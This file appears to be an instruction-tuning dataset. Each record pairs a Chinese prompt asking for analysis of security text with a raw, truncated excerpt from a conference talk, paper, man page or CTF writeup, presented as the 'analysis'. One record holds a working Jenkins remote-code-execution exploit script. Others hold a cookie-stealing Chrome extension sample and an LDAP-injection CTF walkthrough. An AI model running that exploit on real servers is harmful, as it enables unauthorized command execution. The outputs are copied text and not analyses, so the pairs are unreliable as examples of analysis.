{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHardware Hacking for Software Geeks David Gustin and Ab3nd Introduction  Why this talk?  Building a lab  Tools  Forward Engineering  Reverse Engineering Building a Lab  Space  Ventilation  Lighting  Work surfaces  Grounding Soldering  Iron selection  Solder selection  Practicing  Limits of human ability Advanced Soldering Tricks  Toaster oven reflow soldering  Skillet reflow soldering  Hot air tools Toaster Oven Refow  Toaster oven as heat source  Temperature controlled by computer Skillet Reflow  Electric skillet as heat source  Easier to watch progress Hot Air Tools  Heat gun  Hot air pencil Tools  Volt/Ohm meter (VOM)  Oscilloscope  Logic probe  Logic analyzer Volt/Ohm Meter  Analog vs. digital  Bells and whistles Oscilloscopes  Analog vs. digital  DIY or buy?  Secondhand or new? Logic Probes  Display the state of a single logic signal  DIY or buy? Logic Analyzers  Display the state of multiple logic signals  Usually can record signals  DIY versions USB tools  Portable, can be cheaper  May be OS constrained DIY tools  XOScope  Parallel port logic analyzers  JTAG wigglers  Flash Dumpers Sources  The Internet  Harbor Freight, Ebay (also has bio lab gear)  Hamfests  Dumpster Diving  Colleges  Befriend some real scientists Autodiadacticism!  Engineer's Notebook series  Forrest Mims  The Art of Electronics (aka The Bible)  Horowitz and Hill  Application Notes Forward Engineering As opposed to...the other kind. Process  Gather requirements  Research resources  Assemble solution  Test and refine Chip Selection  Architecture  Speed  Storage space  I/O  Embedded peripherals Embedded Architectures  PowerPC  ARM  MIPS  X86  HC91S12  ARM  PIC Evaluation Boards  Purpose  Sources GNU Toolchains  Allows crosscompilation  Availability highly variable Embedded OSs  OS or not?  Embedded Linux  FreeRTOS  DOS (No, really) No OS  Task loop  Data storage  Interrupts  I/O  Timers Building Blocks  Pluggable functionality  Object Oriented hardware! Communication  CAN bus  SPI / 2Wire / I", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGAME OF CHROMES Owning the Web with Zombie Chrome Extensions Tomer Cohen April 2016 Sign-up Graph 1000 RPM 9000 RPM Sign-up Graph 1000 RPM 9000 RPM Investigating Attack Patterns 10 Sec Attack Page Attack Page Google Web Store Extension Course of Action Inject Code Into Facebook tabs Open Wix Frame Transparently inside a Facebook page Sign Up to Wix From within the frame /register /register Extension Course of Action Inject Code Into Facebook tabs Open Wix Frame Inside a Facebook page Sign Up to Wix Bypassing bot detection Publish Wix Website That leads to attack page Distribute Link Among all Facebook friends Review Extension In Google Web Store The Objective: Use Wix as a distributor to form a bot net Bot Masters: What Do They Want? Send Spam DDoS Attacks Scrape Websites Click Frauds June 2016 April 2016 Tag Me If You Can User Click Facebook Friends Extension New Payload Instance This Magical Bot What Makes A Good Bot Goal: Look Human Human Context Javascript Challenges Browser Extension: The Perfect Bot { \"update_url\": \"https://clients2.google.com/ service/update2/crx\", \"background\": { \"scripts\": [ \"view.js\" ] }, \"browser_action\": { \"default_icon\": \"viadeo.png\", \"default_popup\": \"index.html\" }, \"content_scripts\": [ { \"js\": [ \"jquery.js\", \"crack.js\" ], \"matches\": [ \"*://*.viadeo.com/*\" ] } ], What An Extension Can Do \"description\": \"Permet de profiter des avantages d'un compte vi \"icons\": { \"128\": \"viadeo.png\", \"16\": \"viadeo.png\", \"48\": \"viadeo.png\" }, \"manifest_version\": 2, \"name\": \"Viad30 Unlocker\", \"permissions\": [ \"tabs\", \"*://*.viadeo.com/\", \"storage\", \"webNavigation\", \"http://*/*\", \"https://*/*\", \"cookies\", \"webRequest\", \"webRequestBlocking\" ], \"version\": \"3.4\", \"content_security_policy\": \"script-src 'self' 'unsafe-eval'; ob } Extension Manifest Cross-origin request ability Background script Snatch user cookies from any tab chrome.tabs.onUpdated.addListener(function(gdhndztwu, ylvmbrzaez, ypujhmpyy) { var xhr_obj = juykhjkhj(); xhr_obj['onreadystatechange'] =", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Hey Emacs! This file is -*- nroff -*- source. .\\\" .\\\" Copyright 1993 Rickard E. Faith (faith@cs.unc.edu) .\\\" Portions extracted from /usr/include/sys/socket.h, which does not have .\\\" any authorship information in it. It is probably available under the GPL. .\\\" .\\\" Permission is granted to make and distribute verbatim copies of this .\\\" manual provided the copyright notice and this permission notice are .\\\" preserved on all copies. .\\\" .\\\" Permission is granted to copy and distribute modified versions of this .\\\" manual under the conditions for verbatim copying, provided that the .\\\" entire resulting derived work is distributed under the terms of a .\\\" permission notice identical to this one .\\\" .\\\" Since the Linux kernel and libraries are constantly changing, this .\\\" manual page may be incorrect or out-of-date. The author(s) assume no .\\\" responsibility for errors or omissions, or for damages resulting from .\\\" the use of the information contained herein. The author(s) may not .\\\" have taken the same level of care in the production of this manual, .\\\" which is licensed free of charge, as they might when working .\\\" professionally. .\\\" .\\\" Formatted or processed versions of this manual, if unaccompanied by .\\\" the source, must acknowledge the copyright and authors of this work. .\\\" .\\\" .\\\" Other portions are from the 6.9 (Berkeley) 3/10/91 man page: .\\\" .\\\" Copyright (c) 1983 The Regents of the University of California. .\\\" All rights reserved. .\\\" .\\\" Redistribution and use in source and binary forms, with or without .\\\" modification, are permitted provided that the following conditions .\\\" are met: .\\\" 1. Redistributions of source code must retain the above copyright .\\\" notice, this list of conditions and the following disclaimer. .\\\" 2. Redistributions in binary form must reproduce the above copyright .\\\" notice, this list of conditions and the following disclaimer in the .\\\" documentation and/or other materials provided with the distribution. .\\\" 3. All ad", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe$Open$Crypto$Audit$Project:$ Our$Story6 Kenneth White & Matthew Green DEF CON 22 | 2014.08.08 Open$Crypto$Audit$Project6 Everyone has a story. This is ours. DEF CON 22 | 2014.08.08 Agenda6  First Principles  Post-Snowden Era  The TrueCrypt Story  Open Crypto Audit Project  Secure Coding & Trust  Looking Ahead  Open Discussion (and swag!) DEF CON 22 | 2014.08.08 About$Us6 DEF CON 22 | 2014.08.08 Kenneth$White6  Interests: RT signals, embedded systems, analytics  First DEFCON: DC10  Formal training: bio-signals (EEG/ERP, MRI, PET, EKG, EOG)  Early career: databases, *nix, RTOS, h/w drivers  Lifecycle: FDA (cardiac safety), SEI SEPG, IA  Defense: network security, API endpoints  Recently: public cloud security, ML/classification, safety-critical systems, breaking crypto/networks/ websites/OS  Now: OCAP, Linux Foundation CII, NGO security  @kennwhite DEF CON 22 | 2014.08.08 I$like$to$work$on$interesting$problems6 DEF CON 22 | 2014.08.08 MaDhew$Green6  Johns Hopkins University: Computer Science  Teaches applied cryptography  Builds secure systems  Trained under Susan Hohenberger &Avi Rubin  Former senior research staff: AT&T Labs  On-going Research includes: o Techniques for privacy-enhanced information storage o Anonymous payment systems (including ZeroCoin) o Bilinear map-based cryptography  @matthew_d_green DEF CON 22 | 2014.08.08 MaDhew$Green6 DEF CON 22 | 2014.08.08 (not his actual Dachshunds) Long$journey$to$DEFCON$(no,$really)6 DEF CON 22 | 2014.08.08 (my actual Shepherds, semi-medicated) Im here to share what I know, and learn with and from you.  Jack Daniel DEF CON 22 | 2014.08.08 First$Principles6 If a bad guy can persuade you to run his program on your computer, it's not your computer anymore.  Scott Culp DEF CON 22 | 2014.08.08 First$Principles6 If a bad guy can persuade you to run his program on your computer, it's not your computer anymore.  Scott Culp Even if it has disk encryption.  Kenn White DEF CON 22 | 2014.08.08 Crypto$101:$First$Principles6 Thomp", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/python # coding: UTF-8 # author: Orange Tsai(@orange_8361) # import sys import requests from enum import Enum # remove bad SSL warnings try: requests.packages.urllib3.disable_warnings() except: pass endpoint = 'descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript' class mode(Enum): ACL_PATCHED = 0 NOT_JENKINS = 1 READ_ENABLE = 2 READ_BYPASS = 3 ENTRY_NOTFOUND = 999 def usage(): print ''' Usage: python exp.py <url> <cmd> ''' def _log(msg, fail=False): nb = '[*]' if fail: nb = '[-]' print '%s %s' % (nb, msg) def _get(url, params=None): r = requests.get(url, verify=False, params=params) return r.status_code, r.content def _add_bypass(url): return url + 'securityRealm/user/admin/' def check(url): flag, accessible = mode.ACL_PATCHED, False # check ANONYMOUS_READ status, content = _get(url) if status == 200 and 'adjuncts' in content: flag, accessible = mode.READ_ENABLE, True _log('ANONYMOUS_READ enable!') elif status == 403: _log('ANONYMOUS_READ disable!') # check ACL bypass, CVE-2018-1000861 status, content = _get(_add_bypass(url)) if status == 200 and 'adjuncts' in content: flag, accessible = mode.READ_BYPASS, True else: flag = mode.NOT_JENKINS # check entry point, CVE-2019-1003005 if accessible: if flag is mode.READ_BYPASS: url = _add_bypass(url) status, content = _get(url + endpoint) if status == 404: flag = mode.ENTRY_NOTFOUND return flag def exploit(url, cmd): payload = 'public class x{public x(){new String(\"%s\".decodeHex()).execute()}}' % cmd.encode('hex') params = { 'sandbox': True, 'value': payload } status, content = _get(url + endpoint, params) if status == 200: _log('Exploit success!(it should be :P)') elif status == 405: _log('It seems Jenkins has patched the RCE gadget :(') else: _log('Exploit fail with HTTP status [%d]' % status, fail=True) if 'stack trace' in content: for _ in content.splitlines(): if _.startswith('Caused:'): _log(_, fail=True) if __name__ == '__main__': if len(sys.argv) != 3: usage", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEDS: Exploitation Detection System By Amr Thabet Q-CERT About The Author v Amr Thabet (@Amr_Thabet) v Malware Researcher at Q-CERT v The Author of:  Security Research and Development Framework (SRDF)  Pokas x86 Emulator v Wrote a Malware Analysis Paper for Stuxnet Company Logo Introduction v Now the APT Attack become the major threat v Bypasses all defenses v Standards and Policies doesnt work v Bypasses IDS, IPS, Firewalls .. etc Company Logo Introduction v The Attacker uses:  Client-side attacks and exploits  Spear-phishing attacks v Uses undetectable malwares v Uses HTTP and HTTPs v Attack the servers from the infected clients Company Logo Introduction v The Next Security Technology is the : Exploitation Detection Systems v EDS is only way to stop Attacks from behind v Stop Attacks from Client-Side v Stop successful exploitation for a 0-day Company Logo Company Logo Improvements in Defense Security Technology Improvements EDS IDS Firewall Antivirus Introduction v The Talk today is about:  EDS as a concept and next technology  EDS: the new tool that I created  The Development of EDS  SRDF Framework (adv J ) v I will try to explain everything for who dont know about Exploits  etc Company Logo Company Logo Contents Development and Future work Monitoring System Mitigations in Depth The Design of EDS Motivation and Goals Goals v Stop Exploitation for new 0-days v Works with Memory Corruption Exploits v Detect Compromised Processes v Prevent and/or Alert of Exploited Processes Company Logo Memory Corruption Vulnerabilities v Simply write data in places you are not intended to write on it v Like:  Pointers  Return addresses v Change how the application behave v Check: www.corelan.be Company Logo Antivirus vs EDS v EDS is not signature based v EDS doesnt detect malware v EDS main goal to stop exploitation v EDS is memory based v EDS searches for evidence of Memory corruption and indication of compromise Company Logo Previous Work v Compile-Time Solutions:  Takes Long tim", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSound Effects Exploring acoustic cyber-weapons Matt Wixey August 2019 All references cited are at the end of the slide deck, available on the DEF CON media server! PwC  Research Lead for the PwC UK Cyber Security practice  PhD student at UCL  Previously worked in LEA doing technical R&D  Black Hat USA, DEF CON, ISF Congress, BruCon, 44Con, BSides, etc Matt Wixey 2 August 2019 Sound Effects: Exploring acoustic cyber-weapons PwC  Undertaken as part of my PhD research at UCL  Supervisors & co-authors:  Prof. Shane Johnson (https://www.ucl.ac.uk/jill-dando-institute/about- us/people/academic-staff/shane-johnson)  Assoc. Prof. Emiliano De Cristofaro (https://emilianodc.com/)  The following is presented for educational purposes only Disclaimer 3 August 2019 Sound Effects: Exploring acoustic cyber-weapons PwC  DEF CON 25: See no evil, hear no evil  https://www.youtube.com/watch?v=gFTiD7EnVjU  Interested in unconventional uses of sound, applied to security Why this talk? 4 August 2019 Sound Effects: Exploring acoustic cyber-weapons PwC  Novel class of attack  Empirical experimentation  Increasing attack surface  Building on previous work on:  Malware and physical harm  Acoustic harm  Digital/physical crossover attacks Why should you care? 5 August 2019 Sound Effects: Exploring acoustic cyber-weapons PwC Background Sound Effects: Exploring acoustic cyber-weapons August 2019 6 PwC  Digital/physical malware: Stuxnet, Mirai, Mirksy et al, 2019  Malware inadvertently affecting physical kit: Conficker, Wannacry  Medical implant vulnerabilities  Halperin et al, 2008; Rushanan et al, 2014; Williams & Woodward, 2015; Rios & Butts 2019  Vehicle vulnerabilities (Othmane et al, 2013; Valasek & Miller 2015) Malware and physical harm  some examples 7 August 2019 Sound Effects: Exploring acoustic cyber-weapons Background PwC  Typically, theres an indirect relationship  What about malware that directly affects humans?  Poulsen, 2008; Oluwafemi et al, 2013; Ronen & Shamir, 2016; Rios & Butt", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBinary Obfuscation from the Top Down How to make your compiler do your dirty work. Binary Obfuscation Why Top Down?  Assembly, while simple, is tedious.  Its easier for us to write higher-level code.  Some of us.  Why do it by hand when you can be lazy? Binary Obfuscation Whats the purpose of obfuscation?  To waste time.  To intimidate.  To be a total jerk. Binary Obfuscation What tools will be used?  C and C++  MSVC++ for compilation (sorry) Binary Obfuscation What will not be covered?  Anti-debug  Source obfuscation where it does not relate to binary transformations  Obfuscation effectiveness  Post-compilation obfuscation Important Basics Hopefully we can get through this really quickly. Fun With Pointers car cdr cadr cdar cdadr cdddr caar caaar caaaar caaaaaar Binary Obfuscation Function Pointers  Like string-format vulnerabilities, function pointers are ancient Voodoo.  I honestly dont know who thought these were a good idea, but I freakin love em.  See src/funcptr.c Binary Obfuscation Function Pointers int foo (void) { return 949; } int bar (void) { int (*fooPtr)(void); fooPtr = foo; return fooPtr(); } Binary Obfuscation Method Pointers  Abuse of method pointers would probably make Bjarne Stroustrup really angry.  There is also one thing uglier than function pointers. Thats method pointers.  See src/methodptr.cpp Binary Obfuscation Method Pointers int MyClass::foo(void) { return 310; } int bar (void) { MyClass baz; int (MyClass::*fooPtr)(void); fooPtr = &MyClass::foo; return (MyClass.*baz)fooPtr(); } Calling Conventions I really want to write a clever pun about payphones and DEFCON, but I just cant. Binary Obfuscation Calling Conventions  When making a function call, there are a few ways to do it:  stdcall  cdecl  fastcall  thiscall Binary Obfuscation Calling Conventions  stdcall  Push arguments onto stack  Called function pops from stack  Cleans up its own mess. Binary Obfuscation Calling Conventions  cdecl  Push arguments onto stack  Called function pops from", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA Journey Into Fuzzing WebAssembly Virtual Machines Patrick Ventuzelo #BHUSA @BlackHatEvents #BHUSA @BlackHatEvents Patrick Ventuzelo (@Pat_Ventuzelo)  Founder & CEO of FuzzingLabs | Senior Security Researcher  Fuzzing and vulnerability research  Development of security tools  Training/Online courses  Rust Security Audit & Fuzzing  Go Security Audit & Fuzzing  WebAssembly Reversing & Analysis  Practical Web Browser Fuzzing  Main focus  Fuzzing, Vulnerability research  Rust, Golang, WebAssembly, Browsers  Blockchain Security, Smart contracts  Previously speaker at:  OffensiveCon, REcon, RingZer0, ToorCon, hack.lu, NorthSec, FIRST, etc. 2 #BHUSA @BlackHatEvents Introduction to WebAssembly 3 #BHUSA @BlackHatEvents What is WebAssembly?  Binary instruction format for a stack-based virtual machine  Low-level bytecode  Compilation target for C/C++/Rust/Go/etc.  Generic evolution of NaCl & Asm.js  W3C standard  MVP 1.0 (March 2017), MVP 2.0 (2022/2023)  Natively supported in all major browsers  WebAssembly goals:  Be fast, efficient, and portable  Easily readable and debuggable  Safe (using sandboxed execution environment)  Open and modulable 4 #BHUSA @BlackHatEvents How WebAssembly works? 5 Compilers .wasm WebAssembly Virtual Machine #BHUSA @BlackHatEvents Step 1: Compilation into WebAssembly module 6 Compilers .wasm WebAssembly Virtual Machine Source code & Compiler toolchains LLVM, Emscripten, Binaryen #BHUSA @BlackHatEvents WebAssembly Binary Format 7 Compilation binary file (.wasm) Rust C/C++ #BHUSA @BlackHatEvents Step 2: Execution by the WebAssembly VM 8 Compilers .wasm WebAssembly Virtual Machine Source code & Compiler toolchains LLVM, Emscripten, Binaryen Runtime & Host environments V8, wasmer, wasmtime #BHUSA @BlackHatEvents .wasm WebAssembly VM - Execution stages 9 WebAssembly VM #BHUSA @BlackHatEvents 1. Decoding/Parsing: The binary format is parsed and converted into a module .wasm WebAssembly VM - Decoding/Parsing 10 WebAssembly VM 1 #BHUSA @BlackHatEvents 1. De", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# TrendMicro Quals 2019 Team: c7, rev, chivay, Eternal, rodbert, des, psrok1, shalom, shizzer ### Table of contents * [Forensics 100- Knocks](forensics_100) * [Exploit 300 - Java](exploit_300) * [Combo 100 - World trip](combo_100) * [Combo 300 - Git](combo_300) * [Reversing 100 - Matrioshka](re_100)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nComparing Application Security Tools Defcon 15 - 8/3/2007 Eddie Lee Fortify Software Agenda Intro to experiment Methodology to reproduce experiment on your own Results from my experiment Conclusions Introduction Tools Used Market Leading Dynamic Testing Tools A Static Code Analyzer Dynamic Test Tracing Tool The Application Open source Java based Blog http://pebble.sourceforge.net Reasons for choosing this application The Experiment Out of the box scans Compared findings from each tool How The Tools Work Dynamic Testing Tools Fuzz web form input Signature and Behavioral Matching Modes of Scanning Auto-crawl Manual crawl Static Code Analyzer Data flow Control flow Semantic Dynamic Test Tracing Tool Bytecode instrumentation Monitor data coming in and out of the application Run in conjunction with other dynamic testing tools Methodology How to reproduce experiments on your own (Dynamic Testing Tools) Download source code Build & Deploy Application Figure out how to cleanly undeploy the application Clear database or stored files Run scanner in mode auto-crawl mode Make sure the application doesnt break during your scans If the app breaks, figure out why the scanner breaks the app. Configure scanner to ignore the parameter(s) causing app to break Note the parameter(s) wont be tested for vulnerabilities and the existence of a DoS vulnerability Undeploy and Redeploy the application Repeat Save the results from your last clean run Repeat for scanner in mode manual-crawl mode Verify the results Verify results through manually testing Record false positive rate Normalize results Record source file and line number information where vulnerabilities occur How to reproduce experiments on your own (Static Testing Tool) Not much to it Point the scanner at code and tell it where it can find needed libraries Scan the same code you use in other tests Verify results are true positives and weed out false positives Verify results through manually testing on running application Record fals", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSQLReInjector Automated Exfiltrated Data Identification Jason A. Novak Assistant Director, Digital Forensics Chicago, IL Andrea London Digital Forensic Examiner Dallas, TX Overview Problem Historical Solution SQLReInjector Demo Get It! Questions? Who We Are Bibliography Problem Problem  97% of data breach cases worldwide involve SQL injection attacks somewhere down the line.  On average the cost of data breach response and remediation is between $194 - $222 per record.  As of July 9th, privacyrights.org cites 330 breaches in 2012 effecting 18.6 million records. (datalossdb.org reports much higher at 723 breaches thus far) Problem Historical response is costly Fly a bunch of consultants to a data center They image the server Analyze the logs Determine what was exfiltrated from reviewing those logs. Typically running SQL commands against SQL server Only going to get costlier Problem SQLReInjector SQLReInjector Demo Time Where to Get It github.com/strozfriedberg QUESTIONS? Bibliography and Thanks  Exploits of a Mom / Little Bobby Tables by Randall Munroe  http://xkcd.com/327/  sqlmap by Bernardo Damele A.G. and Miroslav Stampar  http://sqlmap.org/  DVWA by RandomStorm  http://www.dvwa.co.uk/  Apache Log Parsing  apachelog Python Module, http://code.google.com/p/apachelog/, hfuecks@gmail.com;  Apache-LogRegex Module, search.cpan.org/dist/Apache-LogRegex/, Peter Hickman;  Virtualization of Forensic Images  LiveView, http://liveview.sourceforge.net/, CERT Software Engineering Institute  Replaying SQL Injection Attacks  Bret Padres, http://cyberspeak.libsyn.com  Injection Attack and Data Theft Statistics  Neira Jones, Barclay Card http://news.techworld.com/security/3331283/barclays-97- percent-of-data-breaches-still-due-to-sql-injection/  Thanks to:  Erin Nealy Cox  Cheri Carr  Scott Brown Who We Are 13 San Francisco Los Angeles Dallas Minneapolis Washington, D.C. New York L.I. Purchase Boston Over 270 employees in 11 U.S. and 1 U.K. Offices London Seattle Chicago Jason A.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAsleep at the Keyboard? Assessing the Security of GitHub Copilots Code Contributions Hammond Pearce Department of ECE New York University Brooklyn, NY, USA hammond.pearce@nyu.edu Baleegh Ahmad Department of ECE New York University Brooklyn, NY, USA ba1283@nyu.edu Benjamin Tan Department of ESE University of Calgary Calgary, Alberta, CA benjamin.tan1@ucalgary.ca Brendan Dolan-Gavitt Department of CSE New York University Brooklyn, NY, USA brendandg@nyu.edu Ramesh Karri Department of ECE New York University Brooklyn, NY, USA rkarri@nyu.edu AbstractThere is burgeoning interest in designing AI-based systems to assist humans in designing computing systems, including tools that automatically generate computer code. The most notable of these comes in the form of the first self-described AI pair programmer, GitHub Copilot, which is a language model trained over open-source GitHub code. However, code often contains bugsand so, given the vast quantity of unvetted code that Copilot has processed, it is certain that the language model will have learned from exploitable, buggy code. This raises concerns on the security of Copilots code contributions. In this work, we systematically investigate the prevalence and conditions that can cause GitHub Copilot to recommend insecure code. To perform this analysis we prompt Copilot to generate code in scenarios relevant to high-risk cybersecurity weaknesses, e.g. those from MITREs Top 25 Common Weakness Enumeration (CWE) list. We explore Copilots performance on three distinct code generation axesexamining how it performs given diversity of weaknesses, diversity of prompts, and diversity of domains. In total, we produce 89 different scenarios for Copilot to complete, producing 1,689 programs. Of these, we found approximately 40 % to be vulnerable. Index TermsCybersecurity, Artificial Intelligence (AI), code generation, Common Weakness Enumerations (CWEs) I. INTRODUCTION With increasing pressure on software developers to produce code quickly, ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Cryptanalysis in real life 周立平 等研究團隊 Do u understand real hackers ? 第3頁 綱目 第一章 緒論 第二章 Mifare Classic Card介紹 第三章 Mifare Classic Card現有 攻擊方式 第四章 二代卡的特性 第五章 自然人憑證 第4頁 RFID RFID 非接觸式 Smart Card 第一章 緒論 攻擊背景 Reader Tag 010101 YoYo卡 一卡通 i-cash 第5頁 第一章 緒論 攻擊手段 Reader Tag 加密 解密 竊聽 第6頁 第一章 緒論 現狀 新/舊卡 改良方式 新卡 用3DES etc 舊卡 改善弱點 增加金鑰長度 etc 成本?? 0.8美元/張全球已發行約10億張 第7頁 第二章 Mifare Classic Card介紹 第一節 Mifare Classic Card規格 與結構 第二節 Mifare Classic Card認證 協定 第三節 Crypto-1加密演算法 第四節 Mifare Classic Card弱點 第8頁 第二章 Mifare Classic Card介紹 第一節 Mifare Classic Card規格與結構 規格與特性 1.操作頻率13.56 MHz 2.傳輸速度106 Kbps 3.傳輸距離10cm 第9頁 第二章 Mifare Classic Card介紹 第一節 Mifare Classic Card規格與結構 資料儲存結構 Sector Block 0 Block 1 Block 2 Block 3 0 Manufacturer Code Data Block Data Block Key A, Access Conditions, Key B 1 Data Block Data Block Data Block Key A, Access Conditions, Key B 2 Data Block Data Block Data Block Key A, Access Conditions, Key B 3 Data Block Data Block Data Block Key A, Access Conditions, Key B 4 Data Block Data Block Data Block Key A, Access Conditions, Key B 5 Data Block Data Block Data Block Key A, Access Conditions, Key B 6 Data Block Data Block Data Block Key A, Access Conditions, Key B 7 Data Block Data Block Data Block Key A, Access Conditions, Key B 8 Data Block Data Block Data Block Key A, Access Conditions, Key B 9 Data Block Data Block Data Block Key A, Access Conditions, Key B 10 Data Block Data Block Data Block Key A, Access Conditions, Key B 11 Data Block Data Block Data Block Key A, Access Conditions, Key B 12 Data Block Data Block Data Block Key A, Access Conditions, Key B 13 Data Block Data Block Data Block Key A, Access Conditions, Key B 14 Data Block Data Block Data Block Key A, Access Conditions, Key B 15 Data Block Data Block Data Block Key A, Access Conditions, Key B 第10頁 第二章 Mifare Classic Card介紹 第一節 Mifare Classic Card規格與結構 記憶體儲存結構 UIDBCCManufacturer Code (製造廠商資料) 0x00 DATA Block(資料區塊) 0x01 DATA Block(資料區塊) 0x02 Sector 0x00 4 block, 64bytes Key A, Access Conditions(存取條件), Key B", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNu1L-ZCTF-Writeup By Nu1L 全员 部分脚本请见附件 Misc 类 Misc10-签到题 直接新浪微博搜下 MISC100 xctf 竞赛规则 开始完全没思路解压 word 得到的 document.xml 发现一堆烫然而并没有什 么思路后来根据提示宽窄间距想到是烫的间距利用 python 的 xml 库写一 个小的脚本就可以得到一串 01转化 ascii 就可以了中间需要注意的是不能光 提取 xml 的间距还需要乘上中间的烫的个数 import xml.dom.minidom import sys reload(sys) sys.setdefaultencoding('gbk') dom = xml.dom.minidom.parse('document.xml') root = dom.documentElement str1 = '' bb = root.getElementsByTagName('w:spacing') b= bb[10] b1 = b.getAttribute(\"w:val\") print b1 for k in range(10,len(bb)): if bb[k].getAttribute(\"w:val\") == \"2\" : str1 += '1' * len(str(bb[k].parentNode.parentNode.getElementsByTagName ('w:t')[0].childNodes[0].data).decode('gbk')) elif bb[k].getAttribute(\"w:val\") == \"-2\" : str1 += '0' * len(str(bb[k].parentNode.parentNode.getElementsByTagName ('w:t')[0].childNodes[0].data).decode('gbk')) print str1 print len(str1) #print len(bb) Misc100-码魂 百度了下真有小绿和小蓝那个动漫在第 19 集上得到提示 Hex 编辑器看一下题目给的图片 和漫画差不多我们将小数点后的十进制转换成二进制在转换成 16 进制 这是段 shellcode我这个 web 狗是不知道交给队友果断编译了出来 然后根据主办方的提示zctf 是秘钥同时是 8 字节猜测是 asii 码利用 py 的 pyDes 库写了个小脚本就可以了 Web 类 Web100 老大 首先是爆破尝试各种弱口令无果第一天快结束队友爆破出来了第一个 弱口令zhangwei 密码 123456直到第二天白天登录进去发现有 20 个人 名发现一个 md5 后的 cookie不能解出来 于是自行构造所有的用户名的全拼和密码字典密码字典选用 3389 的常用 字典爆破出第二个弱口令niubenben 密码 123456789吐槽一下要不是 以前看过一个电视剧叫铁齿铜牙纪晓岚我还真不知道这个字怎么读登录进 去提示老大知道 flag 然后发现 cookie解 md5 得到 9+ADk- 根据经验解 utf-7发现是 99 猜测构造是第一位是顺序后面是顺序呢 utf-7 编码所以把 1 编码后补上 变成 1+ADE-然后 md5改 coockie 得到 flag Web150-Injection 一个注入其实不难主要是不太熟悉罢了LDAP 注入 在乌云有这么一篇文章写得很详细http://drops.wooyun.org/tips/967 根据 LDAP 的特性我们可以利用特殊符*去替换过滤器中的一个或多个字 符经过测试 admin *进入 search 页面 输入 test 后发现 再次发现通配符*发现正确可以回显不正确不能回显并且输入有长度 限制 令 uid=*构造)(2=以形成(|(uid=*)(2=*)) 然后看了下 cookie有东西 猜测 description 是一个参数于是构造test)(description= 随机输入字符当 test)(description=z 时有正确回显于是利用 burp 诸位爆 破 得到 flagzctf{303a61ace0204a2d5f352771d6f1bba2} Web300 题目提示侧漏了想到备份文件泄露尝试 index.php~,.index.php.swp, index.php.swp, index.php.bak,发现. index.php.swp 存在下载下来整理一下得到 简单分析得知首先要绕过时间种子获得路径看到下面那个 ttr_random 很 熟悉找了找在 wechall 上找到原题和绕过方法 https://github.com/rk700/rk70", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### 通信领域电话拨号编码 1-9 分别使用 1-9 个脉冲0 则表示使用 10 个脉冲 ### 通信领域Morse 编码 参见 [摩尔斯编码 -维基百科](https://zh.wikipedia.org/wiki/%E6%91%A9%E5%B0%94%E6%96%AF%E7%94%B5%E7%A0%81) ### Morse 编码特点 - 只有 `.` 和 `-` - 最多 6 位 - 也可以使用 `01` 串表示 ### Morse 编码转换工具 - [摩尔斯编码在线转换](http://www.zhongguosou.com/zonghe/moErSiCodeConverter.aspx) ### Morse 编码相关题目 - JarvisOJ - Basec - -.-字符串 ### 通信领域敲击码 敲击码Tap code是一种以非常简单的方式对文本信息进行编码的方法因该编码对信息通过使用一系列的点击声音来编码而命名敲击码是基于 5 5 方格波利比奥斯方阵来实现的不同点是是用 K 字母被整合到 C 中 |Tap Code|1|2|3|4|5| |--|--|--|--|--|--| |1|A|B|C/K|D|E| |2|F|G|H|I|J| |3|L|M|N|O|P| |4|Q|R|S|T|U| |5|V|W|X|Y|Z| ### 通信领域曼彻斯特编码 - [曼彻斯特编码 - 维基百科](https://zh.wikipedia.org/wiki/%E6%9B%BC%E5%BD%BB%E6%96%AF%E7%89%B9%E7%BC%96%E7%A0%81) ### 通信领域格雷编码 - [格雷码 - 维基百科](https://zh.wikipedia.org/wiki/%E6%A0%BC%E9%9B%B7%E7%A0%81)", "category": "text_analysis", "source": "security_papers"}
